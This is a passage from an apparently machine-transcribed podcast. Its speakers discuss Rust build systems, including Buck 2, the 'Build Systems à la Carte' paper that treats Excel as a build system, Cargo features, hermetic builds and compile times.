It's not an inaccurate. Okay. And a part of the problem there was that the language is loose and that that you are, you know, you are having to modify the kind of the scripts of the build system, and there's very little guidance about the the flow of qution and there are types and it's just like there's there's nothing that to really and I was trying to do was just weird enough and it was just really you know what, you know, I always feel like it's it's when you feel that you're, like, I'm very close to getting this working and then you that goes on for, like, 13 straight hours, You're, like, I'm now actually, like, I'm wearing tears are well, I got I have I have been convinced that I'm, like, 10 minutes away from getting this to work for 13 hours, and I I I think I'm gonna start weeping. And then there was an even weirder what WAF. Do you remember WAF, Steve?

Speaker 4: 01:23:23

I am I don't think I ever used it,

Speaker 1: 01:23:26

but I do know that it exists. It was an well, node used it. I I mean, like, build systems that we have discarded. We, humanity, have discarded. I mean, that is a like, that's a that's a grim graveyard, of of build systems no longer used.

Speaker 1: 01:23:42

But the so I I think

Speaker 4: 01:23:44

To to to, like, provide a tiny amount of color on, like, why you originally asked me this question, and I pivoted it to rain. It's like Yeah. Basically, as part of all this work we've been talking about today, I basically and the fact that we've you know, one of the first things I did at Oxide meaningfully was, like, work on the build system for Hubris, and I was, like and then Omicron sort of kinda has a build system in it too. And I was, like, we're we already have 2 bespoke build systems, and this company is, like, 30 people. And so I was like, I'm gonna I'm gonna write the the the next standard, you know, like, let's let's just go back and implement a good build system in Rust.

Speaker 4: 01:24:15

I did all my research and I was like, wow. These are the papers that I want and I really like the work of these authors. And then I discovered Buck 2, and I was like, oh my god. Meta paid the people that wrote those papers to implement them, and it's already in Rust even, so never mind. And so I have not used it on meaningful projects yet, which is why with all of the rain's experience, I, you know, went, like, deflected the question there.

Speaker 4: 01:24:39

But that's, like, how I got into this was doing all that research and seeing all those bodies and, like, looking what I thought was the best current, like, theoretical, setup for all of this. And, but, yeah, but I've not, really used them in production, in anger, let's say, yet.

Speaker 1: 01:24:57

And so, Rain, this is a very interesting paper. So this is, built systems a la carte. What Yes. Tell me a bit about this paper.

Speaker 5: 01:25:03

So, so I believe that this is the paper that Steve was alluding to. Is that right?

Speaker 4: 01:25:07

It is. It is definitely one of the critical papers that I'm refer like, I started converting the code in it to Rust code actively one day.

Speaker 5: 01:25:16

Yeah. So this paper actually, it's it's really interesting because it's written by these it's kind of this, overlap between academics and industry. And one of the authors is Simon Peyton Jones.

Speaker 1: 01:25:31

That's right. Exactly.

Speaker 3: 01:25:32

We know where this is going. So

Speaker 5: 01:25:36

what they did is that they actually ended up looking at build systems as used at various places like, you know, something like gnu make, which is, you know, an early example of a build system. Sorry, make fans. There's, and then it also looks at, Bazel, Buck, and so on. And and and finally, in a in a really, I think, inspired choice, it looks at Excel because Excel is also a build system in the sense that, you know, it has it has a whole execution graph of here are the, cells that depend on these other cells.

Speaker 1: 01:26:13

You mean Excel, the spreadsheet? I'm like, this must be a different Excel. You actually mean the spreadsheet.

Speaker 5: 01:26:19

Yes. Yes. And,

Speaker 1: 01:26:20

Adam just passed out. I think Adam I'm

Speaker 2: 01:26:23

so excited right now.

Speaker 1: 01:26:26

So I so I think, like, actually the folks

Speaker 5: 01:26:29

at Microsoft Research have been really interested in Microsoft Excel because in a sense, it is the world's most commonly used programming language, and it is, like, orders of magnitude more popular than, like, you know, anything that any of us in industry use. And so they ended up looking at Excel as well through the same lens. And they found that you could actually break it up. You could break up you could categorize these all these build systems in a whole bunch of ways. So they they look at 4 prototypical build systems, Make, Excel, Shake, and Bazel.

Speaker 5: 01:27:09

And, they look at, like, what kind of scheduler, these build systems have. Another crucial distinction is whether dependencies in these can be are static or dynamic. In other words, can nodes in the action graph create more nodes within them so that, you know, can a step produce more steps. And, it also looks at things like, you know, whether you can share, like, distributor caching. So they call that the cloud column.

Speaker 5: 01:27:42

So if you look at, page 6, then there's a really nice chart showing that. So, I thought that this is this is kind of I think that this is a really good, like, way to look at it because it also suggests places where, you know, various build systems fall short or, the trade offs that build systems makes. And I think one of the big trade offs in practice does end up being the static versus dynamic dependency, distinction because, who here is a fan of monads? Because what is so some build systems are, don't let you create these additional dependencies, and some build systems do. And the build systems that do, in, like, you know, in academic circles are actually called monadic build systems because they behave like a monad.

Speaker 5: 01:28:35

Because monad is essentially, the the ability to for each individual thing to create more things of that kind. And so, so, you know, I think just looking at it through those through that lens makes a lot of sense. And you know, buck 2 is, like, really principally designed in a very principled fashion, where it tries to make sure that, you know, it can use cloud caches and so on. And it tries to use static, dependencies as much as possible, but it also has an escape hatch for dynamic dependencies, and so on. So it's it's pretty neat.

Speaker 5: 01:29:10

I think, you know, this this paper, just basically very directly inspired Buck 2, just just be just by the ability to categorize, the properties of the build system in all these ways.

Speaker 2: 01:29:23

Now, Rain, tell me if this is accurate, but it may bring it full circle. I was asking David Tolne about, Buck 2 and how it deals with features. They just said, we don't. Exactly. Like the features.

Speaker 2: 01:29:35

The end.

Speaker 3: 01:29:36

Yes. Yes.

Speaker 5: 01:29:36

Yes. And that is, you know, that is one of those places where, you know, oh, in an open source environment, you actually, those features, the ability to specify features like Encargo is very, very useful. But buck 2 is so designed for the, like, you know, MegaCorp. Like, we all agree on a shared set of libraries and features. And so, yeah.

Speaker 5: 01:29:58

So, you know, BUCK2 just does not have support for features, and that will be a blocker, for us to use it. Or we have to think very hard about what we need out of Buck.

Speaker 1: 01:30:07

What does that mean Buck2 does not support features? I'm just I'm

Speaker 5: 01:30:10

I'm So the way Buck2 works is that you so right now, like, you know, we use features. So so these are cargo features. Right? So these are optional flags that turn on or off various parts of the, of the code of the base, right? Like single create, you can see cfg feature equals serde, right, as an example.

Speaker 5: 01:30:33

And then that pulls in like, that lets you pull in the Serti create. You can turn it off if you don't need the Serti feature and so on. And, Basel, sorry. Well, Basel as well as Buck and Buck do don't actually let you say those sorts of things. So you have to say upfront, either I need the SerDes feature or I don't need the SerDes feature.

Speaker 5: 01:30:57

And now it's actually great because at that point, you don't actually like, the whole, like, workspace hack thing becomes, like, not an issue at all. Right? Like, so that then gives you some real advantage. Yeah. I mean,

Speaker 1: 01:31:10

no need to unify features if you have to like, there are no feature support. So yeah.

Speaker 3: 01:31:14

Makes sense.

Speaker 5: 01:31:14

Exactly. So so that's the you know, but that is one of those trade offs that the Buck has a very opinionated model of how it wants the world to be.

Speaker 1: 01:31:26

Yeah. That's really interesting. And then then the the the flip side of that is that around building up scale and and compile times and then no but a bunch of other advantages to hermetic builds, of course. So Yeah. And it's a it's a trade off.

Speaker 1: 01:31:39

It's a it's a balance as as with all these things.

Speaker 4: 01:31:43

One one funny, like, situation with all of this right now is buck 2 is actually not her medic by default, but that's basically a bug. But me and several other people who recently got into it were like, oh, we're so glad that you, made this design choice because I think it makes it much easier as an on ramp to get started because you don't need to be fully hermetic. And then you can, like when you do a remote build, it must actually be fully hermetic. And they were like, yeah. We actually thought that was a bug, and we're planning on, like, removing that possibility.

Speaker 4: 01:32:10

And so I still think that's going to happen, but it's kind of like, as again, an example of that, like, friction and, like, the way you can deal with it or not deal in different ways.

Speaker 1: 01:32:19

Yeah. Interesting. And in terms of, like, how you get that on rip, I do, I I think it's definitely interesting. I think about these totally different ways of of thinking about the build system. And can we possibly move from kinda one to the other?

Speaker 1: 01:32:32

Because it does feel like it's a very big decision and requires a lot of investment. So, miss Ryan, as you said, like, they would not be light for us to move to buck 2.

Speaker 5: 01:32:42

Yeah.

Speaker 1: 01:32:42

It need to be a big payoff kind of at the end. We are using buck 2 for, right now, our our current use of buck 2 anyway or the what will be a buck use of buck 2 is around FPGA synthesis. So, it it it's looking promising there.

Speaker 5: 01:32:58

Yeah. And, you know, another one that occurred to me is, since Rust analyzer came up, I don't believe that at the moment, Rust analyzer works with buck 2. It it

Speaker 4: 01:33:07

has gotten way, way better since you you you you hesitated for correct reasons. Like, specifically, David Barsky has been working on this a lot lately, and I don't believe it is, like, perfect, but, it has significantly improved over the last, like, 6 months, let's say.

Speaker 5: 01:33:25

Okay. That's awesome.

Speaker 1: 01:33:27

But, yeah,

Speaker 4: 01:33:27

it's a you're also not wrong in the sense of what you're saying earlier. Right? Tools that expect cargo and are used to invoking cargo to do the things they need to do, there needs to be some sort of layer there, and that's complexity.

Speaker 1: 01:33:39

Yep. Yeah. Well, it it build times are, it's obviously extremely important. It it's all around that kind of that that developer flow and getting that feedback quickly. And there there's Rust gives us so much, and, he also gives us the challenge of figuring out how to make our builds faster.

Speaker 1: 01:33:59

So a lot we can go do. It's a terrific discussion. Sean obviously done terrific work on our own builds and reign all of your terrific work on Hakari and getting that integrated and and getting to to the root cause of this stuff. And, Steve, obviously, as you've said up from the top, like, build systems have been, something that that have been a real important part of of your work for a long time. So this is fun.

Speaker 1: 01:34:26

I think that, and, Adam, I Excel is a build system. I mean, you can

Speaker 2: 01:34:31

Love it.

Speaker 1: 01:34:32

Yeah. Didn't have that in the, in the cards, but glad glad to check off that bingo card. Exactly. Awesome. Well, this is a great discussion.

Speaker 1: 01:34:40

Thank you every everyone. And, I know it's a it's been a relief for everyone to have a discussion in which we didn't mention AI once. So good going. I was tempted to a couple of times. I tell you, I was I was really very tempted to Well,

Speaker 5: 01:34:53

I know how how Facebook has started to use AI to figure out which, bills to run and so on. But There you go. I can make another thing.

Speaker 1: 01:35:01

There we go. I knew we were coming here. Yeah. I know. I just did it.

Speaker 1: 01:35:04

I just did the thing I said I was gonna do. Alright. On that note, thanks everybody. Talk to you next time.

Creators and Guests

Host

Adam Leventhal

Host

Bryan Cantrill

Broadcast by

Creators and Guests

headphones Listen Anywhere

Listen Anywhere